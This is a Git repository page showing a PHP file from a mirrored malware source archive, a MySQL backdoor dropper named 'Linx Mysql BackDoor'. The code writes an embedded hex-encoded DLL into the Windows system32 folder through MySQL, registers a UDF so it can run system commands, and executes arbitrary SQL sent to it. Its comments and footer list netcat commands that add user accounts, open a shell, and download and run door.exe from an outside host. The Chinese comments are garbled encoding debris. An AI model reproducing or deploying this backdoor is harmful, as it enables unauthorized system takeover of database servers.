ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 09:56:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
80d8354091
MalwareSourceCode/PHP/Trojan-Dropper.PHP.Agent.a

157 lines
44 KiB
Plaintext
Raw Normal View History

Add files via upload
2020-10-10 03:05:41 +00:00
<?
//Linx Mysql BackDoor
//linyujian@bjfu.edu.cn
//2007.2.9
/*
<!--
Linx Mysql Door
Mysql BackDoor<6F><72>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>PHP+Mysql<71><6C><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ĺ<EFBFBD><C4BA><EFBFBD>,<2C>ú<EFBFBD><C3BA>Ű<EFBFBD>װ<EFBFBD><D7B0>ΪMysql<71><6C><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ִ<EFBFBD><D6B4>ϵͳ<CFB5><CDB3><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"state"<22><><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Mysql<71><6C><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Dll<6C><6C><EFBFBD><EFBFBD>̽<EFBFBD>ͺ<EFBFBD><CDBA><EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Windows<77><73>ӵ<EFBFBD><D3B5><EFBFBD><EFBFBD>Mysqlһ<6C><D2BB><EFBFBD><EFBFBD>ϵͳȨ<CDB3><C8A8>,<2C>Ӷ<EFBFBD><D3B6><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʵ<EFBFBD><CAB5><EFBFBD><EFBFBD><EFBFBD>޶˿<DEB6>,<2C>޽<EFBFBD><DEBD><EFBFBD>,<2C>޷<EFBFBD><DEB7><EFBFBD><EFBFBD>Ĵ<EFBFBD>ǽľ<C7BD><C4BE>.
<EFBFBD>÷<EFBFBD>
<EFBFBD><EFBFBD>Mysql.php<68><70><EFBFBD><EFBFBD>PHP<48><50><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD>"<22>Զ<EFBFBD><D4B6><EFBFBD>װMysql BackDoor",
<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
[ʹ<>û<EFBFBD><C3BB><EFBFBD>Sniff<66>ĺ<EFBFBD><C4BA><EFBFBD>]
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ŵ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˿ڷ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"Mysql-"(ע<><D7A2><EFBFBD><EFBFBD>Сд)<29><>ͷ<EFBFBD><CDB7><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>:
1.<2E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: nc ip 80->Mysql-cmd /c net user abc /add>c:/log.txt! (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"!"<22><><EFBFBD><EFBFBD>ʡ<EFBFBD><CAA1>)
2.<2E>÷<EFBFBD><C3B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Shell<6C><6C><EFBFBD><EFBFBD><EFBFBD><EFBFBD>20082<38>˿<EFBFBD>:<3A><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>nc <20>Clp 20082,<2C><>nc ip 80->Mysql-c- (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"-"<22><><EFBFBD><EFBFBD>ʡ<EFBFBD><CAA1>)
3.<2E>÷<EFBFBD><C3B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>:nc ip 80->Mysql-http://www.x.com/door.exe -c mydoor.exe!
ע<EFBFBD><EFBFBD>:<3A><><EFBFBD><EFBFBD>ֻ<EFBFBD><D6BB>̽<EFBFBD><CCBD>"Mysql-"<22><>ͷ<EFBFBD><CDB7><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA>ռ<EFBFBD>и<EFBFBD><D0B8>ٵ<EFBFBD>ϵͳ<CFB5><CDB3>Դ.
-->
*/
error_reporting(0);
extract($_POST);
extract($_GET);
$action="mysql";
$mysql_hostname=$mysql_hostname?$mysql_hostname:"127.0.0.1";
$mysql_username=$mysql_username?$mysql_username:"root";
$post_sql=$post_sql?$post_sql:"select state(\"net user\")";
$mysql_dbname=$mysql_dbname?$mysql_dbname:"mysql";
if($install){
$link = mysql_connect ($mysql_hostname,$mysql_username,$mysql_passwd) or die(mysql_error());
mysql_select_db($mysql_dbname,$link) or die(mysql_error());
@mysql_query("DROP TABLE udf_temp", $link);
//@mysql_query("drop function state", $link);
$query="CREATE TABLE udf_temp (udf BLOB);";
if(!($result=mysql_query($query, $link)))
die('<27><><EFBFBD><EFBFBD>:<3A><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1>udf_temp<6D><70><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'.mysql_error());
else
{
$code=get_code();
$query="INSERT into udf_temp values (CONVERT($code,CHAR));";
if(!mysql_query($query, $link))
{
mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
die('<27><><EFBFBD><EFBFBD>:<3A><><EFBFBD><EFBFBD>DLL<4C><4C><EFBFBD>ݳ<EFBFBD><DDB3><EFBFBD><EFBFBD><EFBFBD>'.mysql_error());
}
else
{
$dllname="mysqlDll.dll";
if(file_exists("c:\\windows\\system32\\")) $dir="c:\\\\windows\\\\system32\\\\mysqlDll.dll";
elseif(file_exists("c:\\winnt\\system32\\")) $dir="c:\\\\winnt\\\\system32\\\\mysqlDll.dll";
if(file_exists($dir)) {
$time=time();
$dir=str_replace("mysqlDll","mysqlDll_$time",$dir);
$dllname=str_replace("mysqlDll","mysqlDll_$time",$dllname);
}
$query="SELECT udf FROM udf_temp INTO DUMPFILE '".$dir."';" ;
//echo $query;
if(!mysql_query($query, $link))
{
//mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
die("<22><><EFBFBD><EFBFBD>DLL<4C>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ȩ<EFBFBD>޻<EFBFBD><DEBB><EFBFBD> $dir <20>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD>ڡ<EFBFBD>".mysql_error());
}
else
{
echo 'DLL<4C>ѳɹ<D1B3><C9B9>ĵ<EFBFBD><C4B5><EFBFBD><EFBFBD><EFBFBD>'.$dir.'<br>';
}
}
mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
$result=mysql_query("Create Function state returns string soname '$dllname'", $link) or die(mysql_error());
if($result) {
echo "MysqlDoor<6F><72>װ<EFBFBD>ɹ<EFBFBD><C9B9><EFBFBD><br><a href='?'><3E><><EFBFBD><EFBFBD></a>";
exit();
}
}
}
?>
<meta http-equiv="content-type" content="text/html;charset=gb2312">
<title>Linx Mysql Door</title>
<form method="post" action="<?echo $HTTP_SERVER_VARS['php_self'];?>?">
Host: <input name="mysql_hostname" value="<?echo $mysql_hostname;?>" type="text" class="input" size="15" >
User: <input name="mysql_username" value="<?echo $mysql_username;?>" type="text" class="input" size="10" >
Password: <input type="password" name="mysql_passwd" value="<?echo $mysql_passwd;?>" class="input" size="10" >
DB: <input name="mysql_dbname" value="<?echo $mysql_dbname;?>" type="text" class="input" size="10" >
&nbsp;&nbsp;<input name="install" type="submit" value="<22>Զ<EFBFBD><D4B6><EFBFBD>װMysql BackDoor">
<br>
<br>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>SQL<EFBFBD><EFBFBD><EFBFBD><br>
<textarea name="post_sql" cols="50" rows="8"><?echo stripslashes($post_sql);?>
</textarea>
<br> <br>
<input name="" type="submit" value="ִ<><D6B4>SQL<51><4C><EFBFBD><EFBFBD>">
</form><br><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ<EFBFBD><CFA2>
<?
if ($_POST[post_sql]) {
$link = mysql_connect ($mysql_hostname,$mysql_username,$mysql_passwd) or die(mysql_error());
if($mysql_dbname) mysql_select_db($mysql_dbname,$link) or die(mysql_error());
$query=stripslashes($post_sql);
$result = mysql_query($query, $link) or die(mysql_error());
?>
<br>
<textarea name="post_sql" cols="80" rows="15">
<?
echo ($result) ? "SQL<51><4C><EFBFBD><EFBFBD><EFBFBD>ɹ<EFBFBD>ִ<EFBFBD><D6B4>:$result\n\n" : "<22><><EFBFBD><EFBFBD>:$result\n\n ".mysql_error();
while ($row = @mysql_fetch_array ($result)) {
print_r ($row);
}
//mysql_free_result($result);
}
?>
</textarea>
<?
function get_code() {
return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000009BBB9A02DFDAF451DFDAF451DFDAF451A4C6F851DDDAF4515CC6FA51CBDAF45137C5FE518BDAF451DFDAF451DCDAF451BDC5E751DADAF451DFDAF55184DAF45137C5FF51DCDAF45137C5F051DEDAF45152696368DFDAF4510000000000000000504500004C010300B2976A460000000000000000E0000E210B01060000500000001000000090000010E6000000A0000000F000000000001000100000000200000400000000000000040000000000000000000100001000000000000002000000000010000010000000001000001000000000000010000000D8F000007400000000F00000D80000000000000000000000000000000000000000000000000000004CF100000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000900000001000000000000000040000000000000000000000000000800000E055505831000000000050000000A000000048000000040000000000000000000000000000400000E055505832000000000010000000F0000000020000004C0000000000000000000000000000400000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000322E303200555058210D09020A459475C59FCC587632C900000F46000000B00000260A00BC6FEDDDFF558BEC6AFF6800007148040ED064A10507506489FFD8FF9F2583EC0C5356578965E8C745FC0F7D0C0175236A00FFEDB77B012E05B008FF150970008945E4EB09B81E7363BB0124C38B2FFF000F8B4DF05FF6FFD94E0D5F5E5B8BE55DC20C0090008B442499ACFDF604C740081C100432C0C30F8F58FDAC7D0081EC8C090592C685E8FBFF77DFBD6100B9FF1733C08DBDE90DF3AB66ABAA33DB895DFC8B33DBBBFF450C8338010F85770380480439190A6C53EFFEFFBF80988B50088B0250E80A005DDC83C40885C00F84511A889DC8F6F720276B414EC9F6C785BC0A9FD9DC5D0C16899DC0090FC4D853A1FBF6DF8D8D1A518D95CCFA06528D85B80D500EB399661B2C256C44246CCDF7EFB116288B852A8985ACF605A866EEEE8C6C559C985668050134776723CD95C852240CBFBA8883C9DFDCFFB7FF9CF2AEF7D12BF98BF78BFA8BD1100E4F8BCAC1B3CDFDF6E902F3A50683E103F3A4FBF2083566B604D88B393284B4C1B5DB60E6D8FBB153006A0103FF6B63838A538B20B4283BC3752D6A0A6D84436EF0E8FB1C4F473ADBAF3D7C12516670380B52E917059E0B67B30CF72A18B9D0FA40FB0E72106AD1FA6803FA8D1D93CBD8D84268FF14D0FAC47E0990583A548D64D9BA6F3EE5117E8BF089B564B9535EC803C2993B046AA18BB810CD2ED81B0E567420C63C10FFB9E53B72C6000163E8EBBA1882FBB7B9850436D41105B0596A206A03049D306B6E037D7EB2BF0CF6B171F37B6883FEFF6A85385618DCEFEF2D94F889BD408D4764A80FF652F1DC2F942DB9590C89036A9D5679F8CFBE564F01515030108B13C6043A0009446C03E40BD18B3BD9687E2C089318580C04EB366A64B66C8DC972D031745813594ECE0E53C16551C83BE920FDC91E498B5514890AE98B03E63F61EE23C368C80B6389500C3BD37C2939D8751A3233C07F3001BB709155357A0C83910DBB954511420C8651C8D391AC91AE8D513763F24C9552CDB0069B6CC2A4E96551C51C8B6C76695D530C1FA86CB243C27B0C298B5BA5C3A71B4F08A40F8B400C8674DD5B768C07BC91591B00130BC8AEF1B72C1D750683C8FFC2C30E05DCC030D74E060C74092FF202EDB4329054554468020217F6FEBFFE7134F7D81BC04081C41A5E903D814C060F6808B8640426B073A466121C866DCBB6417B885DA87401A902ADB17EE3D2B76603B58845B71684FEF1888590FFFE7D72BB06563F84BD910AE983CF3F4F9B2E347D942C6A02227175943B5A018CEDF7751616FC1708EC3F79044888FEFE71103BC7751D560A1BC60B6C14326A107A8D74235F61B8E73A52180F66DB8D2C2C88980B531CAE9A338FCA02DD827A1D0E203DB8C9B537DC9004B9827E8B3089CAB4D6D37CB01D80B471D337110CE748BEDDEC6F6A081AA8D177E6489E04A0B6138D55A8E
}
?>
<pre>
-Linx Mysql BackDoor
-2007.6.9
<EFBFBD><EFBFBD>дMysql<EFBFBD>Ĺ<EFBFBD><EFBFBD><EFBFBD>Ա<EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD>"<22>Զ<EFBFBD><D4B6><EFBFBD>װMysqlDoor"<22><>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Mysql<71><6C><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"state"<22><><EFBFBD><EFBFBD>,ͬʱ<CDAC><CAB1><EFBFBD><EFBFBD>Mysql<71><6C><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>л<EFBFBD><D0BB><EFBFBD><EFBFBD><EFBFBD>̽<EFBFBD>ĺ<EFBFBD><C4BA><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ο<EFBFBD><EFBFBD><EFBFBD><!--<2D><>װ<EFBFBD><D7B0>Create Function state returns string soname 'mysqlDll.dll';-->
ִ<>У<EFBFBD>select state("net user");
ж<>أ<EFBFBD>drop function state;
ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"drop function state;"<22><><EFBFBD><EFBFBD>ʹmysql<71>˳<EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ָ<EFBFBD><D6B8><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
nc ip 80->Mysql-c- (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>20082<38>˿<EFBFBD>)
nc ip 80->Mysql-cmd /c net user abc /add>c:/log.txt!
nc ip 80->Mysql-http://www.x.com/door.exe -c mydoor.exe!
ע<EFBFBD><EFBFBD>:<3A><><EFBFBD><EFBFBD>ֻ<EFBFBD><D6BB>̽<EFBFBD><CCBD>"Mysql-"<22><>ͷ<EFBFBD><CDB7><EFBFBD><EFBFBD><EFBFBD>ݰ<EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA>ռ<EFBFBD>и<EFBFBD><D0B8>ٵ<EFBFBD>ϵͳ<CFB5><CDB3>Դ.
</pre>
Reference in New Issue Copy Permalink